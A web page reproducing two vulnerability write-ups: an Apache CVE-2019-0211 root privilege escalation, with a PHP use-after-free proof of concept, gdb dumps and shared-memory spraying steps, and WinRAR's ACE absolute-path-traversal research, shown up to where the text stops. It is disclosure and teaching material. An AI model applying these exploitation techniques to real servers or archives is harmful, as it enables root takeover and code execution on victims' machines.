CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

Original text by cfreal

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles.

The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), the scoreboard, which contains various information such as the workers’ PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447, 
  generation = 0, 
  quiescing = 0 '\000', 
  not_accepting = 0 '\000', 
  connections = 0, 
  write_completion = 0, 
  lingering_close = 0, 
  keep_alive = 0, 
  suspended = 0, 
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
    pid_t pid;
    ap_generation_t generation;
    char quiescing;
    char not_accepting;
    apr_uint32_t connections;
    apr_uint32_t write_completion;
    apr_uint32_t lingering_close;
    apr_uint32_t keep_alive;
    apr_uint32_t suspended;
    int bucket; <- index for all_buckets
}

When Apache gracefully restarts, its main process kills old workers and replaces them with new ones. At this point, every old worker’s bucket value will be used by the main process to access one of its own arrays, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;
    ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
    ...
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    ...
}

No bounds check is performed. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.
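To make the missing check concrete, here is a minimal Python sketch of how C turns an unchecked index into an address. It assumes a 64-bit build where prefork_child_bucket is three 8-byte pointers (24 bytes). The helper names element_address and index_in_bounds are hypothetical, and the check shown is only an illustration of the idea, not the patch Apache shipped.

```python
# Size of prefork_child_bucket on a 64-bit build: three 8-byte pointers (assumption).
BUCKET_SIZE = 3 * 8


def element_address(base: int, index: int, elem_size: int = BUCKET_SIZE) -> int:
    """Address that C computes for &array[index]; no range check is involved."""
    return base + index * elem_size


def index_in_bounds(index: int, num_buckets: int) -> bool:
    """The kind of check the vulnerable code path lacks (illustrative only)."""
    return 0 <= index < num_buckets


# all_buckets address as printed by gdb in this article.
base = 0x7f4a9336b3f0

print(hex(element_address(base, 0)))        # first legitimate element
print(hex(element_address(base, -10000)))   # 240000 bytes before the array
print(index_in_bounds(-10000, 2))           # such an index would be rejected
```

With a check like index_in_bounds in front of the array access, an index taken from memory that workers can write to could not steer the lookup outside the array.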

Vulnerable code

We’ll go through server/mpm/prefork/prefork.c to find out where and how the bug happens.

  • A rogue worker changes its bucket index in shared memory to make it point to a structure of its own, also in SHM.
  • At 06:25AM the next day, logrotate requests a graceful restart from Apache.
  • Upon this, the main Apache process will first kill workers, and then spawn new ones.
  • The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP.
  • Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away.
  • Instead, we enter the main loop (L933) and monitor dead workers’ PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940).
  • The index of the process_score structure associated with this PID is stored in child_slot (L948).
  • If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket’s value has been changed by a rogue worker.
  • make_child() creates a new child, fork()ing (L671) the main process.
  • The OOB read happens (L691), and my_bucket is therefore under the control of an attacker.
  • child_main() is called (L722), and the function call happens a bit further (L433).
  • SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443).
  • Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control.
  • Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four-step process:

  1. Obtain R/W access on a worker process
  2. Write a fake prefork_child_bucket structure in the SHM
  3. Make all_buckets[bucket] point to the structure
  4. Await 6:25AM to get an arbitrary function call

Advantages:

  • The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless)
  • When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache

Problems:

  • PHP does not allow reading or writing /proc/self/mem, which blocks us from simply editing the SHM
  • all_buckets is reallocated after a graceful restart (!)

1. Obtain R/W access on a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0-day UAF in PHP 7.x (which seems to work in PHP 5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
  public function jsonSerialize()
  {
    global $y, $p;
    unset($y[0]);
    $p = $this->y;
    return $this;
  }
}

function get_aslr()
{
  global $p, $y;
  $p = 0;

  $y = [new X('PT1S')];
  json_encode([1234 => &$y]);
  print("ADDRESS: 0x" . dechex($p) . "\n");

  return $p;
}

get_aslr();

This is a UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable through $this.

UAF to Read/Write

We want to achieve two things:

  • Read memory to find all_buckets’ address
  • Edit the SHM to change the bucket index and add our custom mutex structure

Luckily for us, PHP’s heap is located before those two in memory.

Memory addresses of PHP’s heap, ap_scoreboard_image->* and all_buckets

root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so

(gdb) p *ap_scoreboard_image 
$14 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p all_buckets 
$15 = (prefork_child_bucket *) 0x7f4a9336b3f0

Since we’re triggering the UAF on a PHP object, any property of this object will be UAF’d too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string’s structure:

(gdb) ptype zend_string
type = struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1];
}

The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we’re interested in: the SHM and Apache’s all_buckets.
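The effect of a tampered length field can be shown with a toy model. The sketch below is a simplification under stated assumptions: it keeps only an 8-byte little-endian length followed by the bytes (the real zend_string also has gc and h in front), and read_string is a hypothetical helper, not a PHP API.

```python
import struct


def read_string(memory: bytes, offset: int) -> bytes:
    """Read a length-prefixed string: 8-byte little-endian len, then len bytes."""
    (length,) = struct.unpack_from("<Q", memory, offset)
    start = offset + 8
    return memory[start:start + length]


# Toy "heap": one 5-byte string followed by 16 bytes of unrelated data.
heap = bytearray(struct.pack("<Q", 5) + b"hello" + b"SECRET-NEIGHBOUR")
print(read_string(bytes(heap), 0))   # only the string itself

# Growing the length field makes the very same read run past the string.
struct.pack_into("<Q", heap, 0, 5 + 16)
print(read_string(bytes(heap), 0))   # now includes the neighbouring bytes
```

The reader trusts len completely, which is why control over that single field is enough to reach data stored after the string.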

Locating bucket indexes and all_buckets

We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate.

Shared memory location and targeted process_score structures

root@apaubuntu:~# cat /proc/6318/maps | grep rw-s
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)

(gdb) p &ap_scoreboard_image->parent[0]
$18 = (process_score *) 0x7f4a9323e020
(gdb) p &ap_scoreboard_image->parent[1]
$19 = (process_score *) 0x7f4a9323e044
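The 0x24 distance between the two entries matches the layout of process_score. As a quick sanity check, the following sketch rebuilds the structure with Python's ctypes, assuming pid_t and ap_generation_t are 32-bit ints as on a typical 64-bit Linux build; ProcessScore is just an illustrative name.

```python
import ctypes


class ProcessScore(ctypes.Structure):
    """Mirror of struct process_score as printed by gdb (types are assumptions)."""
    _fields_ = [
        ("pid", ctypes.c_int),               # pid_t, assumed 32-bit
        ("generation", ctypes.c_int),        # ap_generation_t, assumed int
        ("quiescing", ctypes.c_char),
        ("not_accepting", ctypes.c_char),    # followed by 2 bytes of padding
        ("connections", ctypes.c_uint32),
        ("write_completion", ctypes.c_uint32),
        ("lingering_close", ctypes.c_uint32),
        ("keep_alive", ctypes.c_uint32),
        ("suspended", ctypes.c_uint32),
        ("bucket", ctypes.c_int),            # index for all_buckets
    ]


# Distance between &parent[1] and &parent[0] in the gdb output.
stride = 0x7f4a9323e044 - 0x7f4a9323e020

print(ctypes.sizeof(ProcessScore), stride)   # structure size vs. observed stride
print(ProcessScore.bucket.offset)            # where bucket sits inside an entry
```

Under these assumptions the bucket field of entry n sits at n * sizeof(process_score) + offsetof(bucket) from the start of the parent array.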

To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have:

Important structures of bucket items

prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}

apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;

    ...
}

apr_proc_mutex_unix_lock_methods_t {
    unsigned int flags;
    apr_status_t (*create)(apr_proc_mutex_t *, const char *);
    apr_status_t (*acquire)(apr_proc_mutex_t *);
    apr_status_t (*tryacquire)(apr_proc_mutex_t *);
    apr_status_t (*release)(apr_proc_mutex_t *);
    apr_status_t (*cleanup)(void *);
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t);
    apr_lockmech_e mech;
    const char *name;
}

all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr’s .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr’s .text.

Since we know those regions’ addresses through /proc/self/maps, we can go through every pointer in Apache’s memory and find one that matches the structure. It will be all_buckets[0].
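Classifying a pointer by region only requires parsing the maps file. Here is a minimal sketch that parses one maps line and tests whether an address falls inside it. Region, parse_maps_line and contains are hypothetical names, and the sample line is the SHM mapping shown earlier in this article.

```python
from typing import NamedTuple


class Region(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


def parse_maps_line(line: str) -> Region:
    """Parse one line of /proc/<pid>/maps into a Region."""
    fields = line.split(None, 5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""
    return Region(start, end, fields[1], path)


def contains(region: Region, address: int) -> bool:
    """True if address falls inside [start, end)."""
    return region.start <= address < region.end


line = "7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)"
shm = parse_maps_line(line)
print(shm.perms, shm.path)
print(contains(shm, 0x7f4a9323e020))   # &parent[0] from the gdb output
print(contains(shm, 0x7f4a9336b3f0))   # all_buckets lives in another region
```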

As I mentioned, all_buckets’ address changes at every graceful restart. This means that when our exploit triggers, all_buckets’ address will be different from the one we found. This has to be taken into account; we’ll talk about this later.

2. Write a fake prefork_child_bucket structure in the SHM

Reaching the function call

The code path to the arbitrary function call is the following:

bucket_id = ap_scoreboard_image->parent[id]->bucket
my_bucket = all_buckets[bucket_id]
mutex = &my_bucket->mutex
apr_proc_mutex_child_init(mutex)
(*mutex)->meth->child_init(mutex, pool, fname)
[Figure: Call:reach]

Calling something proper

To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain:

mutex = &my_bucket->mutex
[object = mutex]

zend_object_std_dtor(object)
    ht = object->properties
    zend_array_destroy(ht)
        zend_hash_destroy(ht)
            val = &ht->arData[0]->val
            ht->pDestructor(val)

pDestructor is set to system, and &ht->arData[0]->val is a string.

[Figure: Call:exec]

As you can see, both leftmost structures are superimposed.

3. Make all_buckets[bucket] point to the structure

Problem and solution

Right now, if all_buckets’ address was unchanged in between restarts, our exploit would be over:

  • Get R/W over all memory after PHP’s heap
  • Find all_buckets by matching its structure
  • Put our structure in the SHM
  • Change one of the process_score.bucket in the SHM so that all_buckets[bucket]->mutex points to our payload

As all_buckets’ address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure, one for each PID.

Spraying the shared memory

If all_buckets’ new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of having our prefork_child_bucket structure at a precise point in the SHM, we can spray it all over unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 =) 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won’t help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address in the rest of the shared memory. The impact will be that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_buckets is relocated not too far from its original address, my_bucket will be in the sprayed area.

[Figure: Call:exec]

Using every process_score

Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance:

ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00
ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00
ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000

This multiplies our success rate by the number of Apache workers. Upon respawn, only one worker has a valid bucket number, but this is not a problem because the others will crash, and immediately respawn.

Success rate

Different Apache servers have different numbers of workers. Having more workers means we can spray the address of our mutex over less memory, but it also means we can specify more indexes for all_buckets. This means that having more workers improves our success rate. After a few tries on my test Apache server with 4 workers (default), I had a ~80% success rate. The success rate jumps to ~100% with more workers.

Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. Apache’s error.log will nevertheless contain notifications about its workers segfaulting.

4. Await 6:25AM for the exploit to trigger

Well, that’s the easy step.

Vulnerability timeline

  • 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC
  • 2019-02-25 Acknowledgment of the vulnerability, working on a fix
  • 2019-03-07 Apache’s security team sends a patch for me to review, CVE assigned
  • 2019-03-10 I approve the patch
  • 2019-04-01 Apache HTTP version 2.4.39 released

Apache’s team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF.

Questions

Why the name?

CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation
DIEM: the exploit triggers once a day

I had to.

Can the exploit be improved?

Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well.

Does this vulnerability target PHP?

No. It targets the Apache HTTP server.

Exploit

The exploit is available here.

Extracting a 19 Year Old Code Execution from WinRAR

Original text by Nadav Grossman

Introduction

In this article, we tell the story of how we found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain full control over a victim’s computer. The exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.

Background

A few months ago, our team built a multi-processor fuzzing lab and started to fuzz binaries for Windows environments using the WinAFL fuzzer. After the good results we got from our Adobe Research, we decided to expand our fuzzing efforts and started to fuzz WinRAR too.

One of the crashes produced by the fuzzer led us to an old, dated dynamic link library (dll) that was compiled back in 2006 without a protection mechanism (like ASLR, DEP, etc.) and is used by WinRAR.

We turned our focus and fuzzer to this “low hanging fruit” dll, and looked for a memory corruption bug that would hopefully lead to Remote Code Execution.
However, the fuzzer produced a test case with “weird” behavior. After researching this behavior, we found a logical bug: Absolute Path Traversal. From this point on it was simple to leverage this vulnerability to a remote code execution.

Perhaps it’s also worth mentioning that a substantial amount of money in various bug bounty programs is offered for these types of vulnerabilities.

Figure 1: Zerodium tweet on purchasing WinRAR vulnerability.

What is WinRAR?

WinRAR is a trialware file archiver utility for Windows which can create and view archives in RAR or ZIP file formats and unpack numerous archive file formats.

According to the WinRAR website, over 500 million users worldwide make WinRAR the world’s most popular compression tool today.

This is what the GUI looks like:

Figure 2: WinRAR GUI.

The Fuzzing Process Background

These are the steps taken to start fuzzing WinRAR:

  1. Creation of an internal harness inside the WinRAR main function which enables us to fuzz any archive type, without stitching a specific harness for each format. This is done by patching the WinRAR executable.
  2. Eliminate GUI elements such as message boxes and dialogs which require user interaction. This is also done by patching the WinRAR executable.
    There are some message boxes that pop up even in CLI mode of WinRAR.
  3. Use a giant corpus from an interesting piece of research conducted around 2005 by the University of Oulu.
  4. Fuzz the program with WinAFL using WinRAR command line switches. These force WinRAR to parse the “broken archive” and also set default passwords (“-p” for password and “-kb” for keep broken extracted files). We found those options in a WinRAR manual/help file.

After a short time of fuzzing, we found several crashes in the extraction of several archive formats such as RAR, LZH and ACE that were caused by a memory corruption vulnerability such as Out-of-Bounds Write. The exploitation of these vulnerabilities, though, is not trivial because the primitives supplied limited control over the overwritten buffer.

However, a crash related to the parsing of the ACE format caught our eye. We found that WinRAR uses a dll named unacev2.dll for parsing ACE archives. A quick look at this dll revealed that it’s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn’t even need to bypass them.

Build a Specific Harness

We decided to focus on this dll because it looked like it would be quick and easy to exploit.

Also, as far as WinRAR is concerned, as long as the archive file has a .rar extension, it would handle it according to the file’s magic bytes, in our case – the ACE format.

To improve the fuzzer performance, and to increase the coverage only on the relevant dll, we created a specific harness for unacev2.dll.

To do that, we need to understand how unacev2.dll is used. After reverse engineering the code calling unacev2.dll for ACE archive extraction, we found that two exported functions should be called for extraction in the following order:

  1. An initialization function named ACEInitDll, with the following signature:
    INT __stdcall ACEInitDll(unknown_struct_1 *struct_1);
    • struct_1: pointer to an unknown struct
  2. An extraction function named ACEExtract, with the following signature:
    INT __stdcall ACEExtract(LPSTR ArchiveName, unknown_struct_2 *struct_2);
    • ArchiveName: string pointer to the path to the ace file to be extracted
    • struct_2: pointer to an unknown struct

Both of these functions required structs that are unknown to us. We had two options to try to understand the unknown struct: reversing and debugging WinRAR, or trying to find an open source project that uses those structs.

The first option is more time consuming, so we opted to try the second one. We searched github.com for the exported function ACEInitDll and found a project named FarManager that uses this dll and includes a detailed header file for the unknown structs.
Note: The creator of this project is also the creator of WinRAR.

After loading the header files into IDA, it was much easier to understand the previously “unknown structs” passed to both functions (ACEInitDll and ACEExtract), as IDA displayed the correct name and type for each struct member.

From the headers we found in the FarManager project, we came up with the following signatures:

INT __stdcall ACEInitDll(pACEInitDllStruc DllData);

INT __stdcall ACEExtract(LPSTR ArchiveName, pACEExtractStruc Extract);

To mimic the way that WinRAR uses unacev2.dll, we assigned the same struct members as WinRAR did.

We started to fuzz this specific harness, but we didn’t find new crashes and the coverage did not expand in the first few hours of the fuzzing. We tried to understand the reason for this limitation.

We started by looking for information about the ACE archive format.

Understanding the ACE Format

We didn’t find an RFC for that format, but we did find vital information on the internet.

1. Creating an ACE archive is protected by a patent. The only software that is allowed to create an ACE archive is WinACE. The last version of this program was compiled in November 2007. The company’s website has been down since August 2017. However, extracting an ACE archive is not protected by a patent.

2. A pure Python project named acefile is mentioned in this Wikipedia page. Its most useful features are:

  • It can extract an ACE archive.
  • It contains a brief explanation about the ACE file format.
  • It has a very helpful feature that prints the file format header with an explanation.

To understand the ACE file format, let’s create a simple .txt file (named “simple_file.txt”), and compress it using WinACE. We will then check the headers of the ACE file using acefile.

This is simple_file.txt

Figure 3: File before compression.

These are the options we selected in WinACE to create our example:

Figure 4: WinACE compression GUI.

This option creates the subdirectories \users\nadavgr\Documents under the chosen extraction directory and extracts simple_file.txt to that relative path.

simple_file.ace

Figure 5: The simple_file.ace produced using WinACE’s “store” compression option for visibility.

Running acefile.py from the acefile project with the headers flag displays information about the archive headers:

Figure 6: Parsing ACE file header using acefile.py.

This results in:

Figure 7: acefile.py header parsing output.

Notes:

  • Consider each “\\” from the filename field in the image above as a single slash “\”, this is just python escaping.
  • For clarity, the same fields are marked with the same color in the hex dump and in the output from acefile.

Summary of the important fields:

  • hdr_crc (marked in pink):
    Two CRC fields are present in 2 headers. If the CRC doesn’t match the data, the extraction is interrupted. This is the reason why the fuzzer didn’t find more paths (expand its coverage). To “solve” this issue we patched all the CRC* checks in unacev2.dll.
    *Note – The CRC is a modified implementation of the regular CRC-32.
  • filename (marked in green):
    It contains the relative path to the file. All the directories specified in the relative path are created during the extraction process (including the file). The size of the filename is defined by 2 bytes (little endian) marked by a black frame in the hex dump.
  • advert (marked in yellow):
    The advert field is automatically added by WinACE, during the creation of an ACE archive, if the archive is created using an unregistered version of WinACE.
  • file content:
    • “origsize” – The content’s size. The content itself is positioned after the header that defines the file (“hdr_type” field == 1).
    • “hdr_size” – The header size. Marked by a gray frame in the hex dump.
    • At offset 70 (0x46) from the second header, we can find our file content: “Hello From Check Point!”

Because the filename field contains the relative path to the file, we did some manual modification attempts to the field to see if it is vulnerable to “Path Traversal.”
For example, we added the trivial path traversal gadget “\..\” to the filename field and more complex “Path Traversal” tricks as well, but without success.

After patching all the structure checks, such as the CRC validation, we once again activated our fuzzer. After a short time of fuzzing, we entered the main fuzzing directory and found something odd. But let’s first describe our fuzzing machine for some necessary background.

The Fuzzing Machine

To increase the fuzzer performance and to prevent an I/O bottleneck, we used a RAM disk drive that uses the ImDisk toolkit on the fuzzing machine.

The RAM disk is mapped to drive R:\, and the folder tree looks like this:

Figure 8: Fuzzer’s folders hierarchy

Detecting the Path Traversal Bug

A short time after starting the fuzzer, we found a new folder named sourbe in a surprising location: the root of drive R:\.

Figure 9: “sourbe”, the unexpected folder which was created during fuzzing.

The harness is instructed to extract the fuzzed archive to sub-directories under “output_folders”. For example, R:\ACE_FUZZER\output_folders\Slave_2\ . So why do we have a new folder created in the parent directory?

Inside the sourbe folder we found a file named RED VERSION_¶ with the following content:

Figure 10: Content of the file that was produced by the fuzzer in the unexpected path “R:\sourbe\RED VERSION_¶”.

This is the hex dump of the test case that triggers the vulnerability:

Figure 11: A hex dump of the file that was produced by the fuzzer in the unexpected path “R:\sourbe\RED VERSION_¶”.

Notes:

  • We made some minor changes to this test case (such as adjusting the CRC) to make it parsable by acefile.
  • For convenience, fields are marked with the same color in the hex dump and in the output from acefile.

Figure 12: Header parsing output from acefile.py for the file that was produced by the fuzzer in the unexpected path.

These are the first three things that we noticed when we looked at the hex dump and the output from acefile:

  1. The fuzzer copied parts of the “advert” field to other fields:
    • The content of the compressed file is “SIO”, marked in an orange frame in the hex dump. It’s part of the advert string “*UNREGISTERED VERSION*”.
    • The filename field contains the string “RED VERSION*” which is part of the advert string “*UNREGISTERED VERSION*”.
  2. The path in the filename field was used in the extraction process as an “absolute path” instead of a relative path to the destination folder (the backslash is the root of the drive).
  3. The extracted file name is “RED VERSION_¶”. It seems that the asterisk from the filename field was converted to an underscore and the \x14\ (0x14) value is represented as “¶” in the extracted file name. The rest of the filename field is ignored because a null char terminates the string after the \x14\ (0x14) value.
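The gap between the declared field size and the name that is actually used can be illustrated with a short sketch. It relies only on what is stated above: the filename is preceded by a 2-byte little-endian size and is later handled as a NUL-terminated string. The sample bytes are hypothetical and only loosely modelled on the test case, and both helper names are made up for this example.

```python
import struct


def read_filename_field(header: bytes, offset: int) -> bytes:
    """Read a filename stored as a 2-byte little-endian size followed by that many bytes."""
    (size,) = struct.unpack_from("<H", header, offset)
    return header[offset + 2:offset + 2 + size]


def as_c_string(raw: bytes) -> bytes:
    """What code treating the field as a NUL-terminated string ends up using."""
    return raw.split(b"\x00", 1)[0]


# Hypothetical field content: a path, a 0x14 byte, a NUL, then leftover bytes.
raw_name = b"\\sourbe\\RED VERSION*\x14\x00ignored tail"
field = struct.pack("<H", len(raw_name)) + raw_name

name = read_filename_field(field, 0)
print(len(name))            # full size declared by the header
print(as_c_string(name))    # part that survives NUL termination
```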

To find the constraints that caused it to ignore the destination folder and use the filename field as an absolute path during the extraction, we made the following attempts, based on our assumptions.

Our first assumption was that the first character of the filename field (the ‘\’ char) triggers the vulnerability. Unfortunately, after a quick check we found out that this is not the case. After additional checks we arrived at these conclusions:

  1. The first char should be a ‘/’ or a ‘\’.
  2. ‘*’ should be included in the filename at least once; the location doesn’t matter.

Example of a filename field that triggers the bug: \some_folder\some_file*.exe will be extracted to C:\some_folder\some_file_.exe , and the asterisk is converted to an underscore (_).
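From a defensive angle, the two conditions above are easy to test for when inspecting the filename fields of an ACE archive. The following is a minimal sketch with hypothetical helper names; it encodes only the two observations listed above plus the asterisk-to-underscore conversion, and it is not a complete detector.

```python
def looks_like_absolute_path_trick(filename: str) -> bool:
    """Flag filename fields that match the two conditions observed above."""
    starts_at_root = filename[:1] in ("/", "\\")
    return starts_at_root and "*" in filename


def name_written_to_disk(filename: str) -> str:
    """Mirror the observed behavior: each '*' ends up as '_' in the extracted name."""
    return filename.replace("*", "_")


sample = "\\some_folder\\some_file*.exe"
print(looks_like_absolute_path_trick(sample))
print(name_written_to_disk(sample))
print(looks_like_absolute_path_trick("users\\nadavgr\\Documents\\simple_file.txt"))
```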

Now that it worked on our fuzzing harness, it is time to test our crafted archive (i.e. the exploit file) on WinRAR.

Trying the exploit on WinRAR

At first glance, it looked like the exploit worked as expected on WinRAR, because the sourbe directory was created in the root of drive C:\ . However, when we entered the “sourbe” folder (C:\sourbe ) we noticed that the file was not created.

These behaviors raised two questions:

  • Why did the harness and WinRAR behave differently?
  • Why were the directories that were specified in the exploit file created, while the extracted file was not?

Why did the harness and WinRAR behave differently?

We expected that the exploit file would behave the same on WinRAR as it behaved in our harness, for the following reasons:

  1. The dll (unacev2.dll ) extracts the files to the destination folder, and not the outer executable (WinRAR or our harness).
  2. Our harness mimics WinRAR perfectly when passing parameters / struct members to the dll.

A deeper look showed that the assumption in our second point was false. Our harness defines 4 callback pointers, and our implemented callbacks differ from WinRAR’s callbacks. Let’s return to our harness implementation.

We mentioned this signature when calling the exported function named ACEInitDll.

INT __stdcall ACEInitDll(pACEInitDllStruc DllData);

pACEInitDllStruc is a pointer to the sACEInitDLLStruc struct. The first member of this struct is tACEGlobalDataStruc. This struct has many members, including pointers to callback functions with the following signature:

INT (__stdcall *InfoCallbackProc) (pACEInfoCallbackProcStruc Info);

INT (__stdcall *ErrorCallbackProc) (pACEErrorCallbackProcStruc Error);

INT (__stdcall *RequestCallbackProc) (pACERequestCallbackProcStruc Request);

INT (__stdcall *StateCallbackProc) (pACEStateCallbackProcStruc State);

These callbacks are called by the dll (unacev2.dll) during the extraction process.
The callbacks are used as external validators for operations that are about to happen, such as the creation of a file, creation of a directory, overwriting a file, etc.
The external callbacks/validators get information about the operation that’s about to occur, for example, file extraction, and return their decision to the dll.

If the operation is allowed, the following constant is returned to the dll: ACE_CALLBACK_RETURN_OK. Otherwise, if the operation is not allowed by the callback function, it returns the following constant: ACE_CALLBACK_RETURN_CANCEL, and the operation is aborted.

For more information about those callback functions, see the explanation from the FarManager project.

Our harness returned ACE_CALLBACK_RETURN_OK for all the callback functions except for the ErrorCallbackProc, where it returned ACE_CALLBACK_RETURN_CANCEL.

It turns out that WinRAR validates the extracted filenames (after the files are extracted and created), and because of those validations in WinRAR’s callbacks, the creation of the file was aborted. This means that after the file is created, it is deleted by WinRAR.

WinRAR Validators / Callbacks

This is part of the pseudo-code of WinRAR’s callback validator that prevents the file creation:

Figure 13: WinRAR validator/callback pseudo-code.

“SourceFileName” represents the relative path to the file that will be extracted.

The function does the following checks:

  1. The first char does not equal “\” or “/”.
  2. The File Name doesn’t start with the following strings “..\” or “../” which are gadgets for “Path Traversal”.
  3. The following “Path Traversal” gadgets do not exist in the string:
    1. \..\
    2. \../
    3. /../
    4. /..\
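The three checks can be restated as a small predicate. The sketch below is a reconstruction from the list above, not WinRAR's actual code (the pseudo-code figure is not reproduced here), and is_relative_path_allowed is a hypothetical name.

```python
# The four traversal gadgets listed in check 3.
TRAVERSAL_GADGETS = ("\\..\\", "\\../", "/../", "/..\\")


def is_relative_path_allowed(source_file_name: str) -> bool:
    """Return True only if none of the three checks described above fires."""
    # Check 1: the first char must not be a slash or a backslash.
    if source_file_name[:1] in ("\\", "/"):
        return False
    # Check 2: the name must not start with a parent-directory prefix.
    if source_file_name.startswith(("..\\", "../")):
        return False
    # Check 3: no traversal gadget anywhere in the string.
    return not any(gadget in source_file_name for gadget in TRAVERSAL_GADGETS)


print(is_relative_path_allowed("users\\nadavgr\\Documents\\simple_file.txt"))
print(is_relative_path_allowed("\\sourbe\\RED VERSION_"))
print(is_relative_path_allowed("docs\\..\\..\\evil.txt"))
```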

The extraction function in unacev2.dll calls StateCallbackProc in WinRAR, and passes the filename field of the ACE format as the relative path to be extracted to.

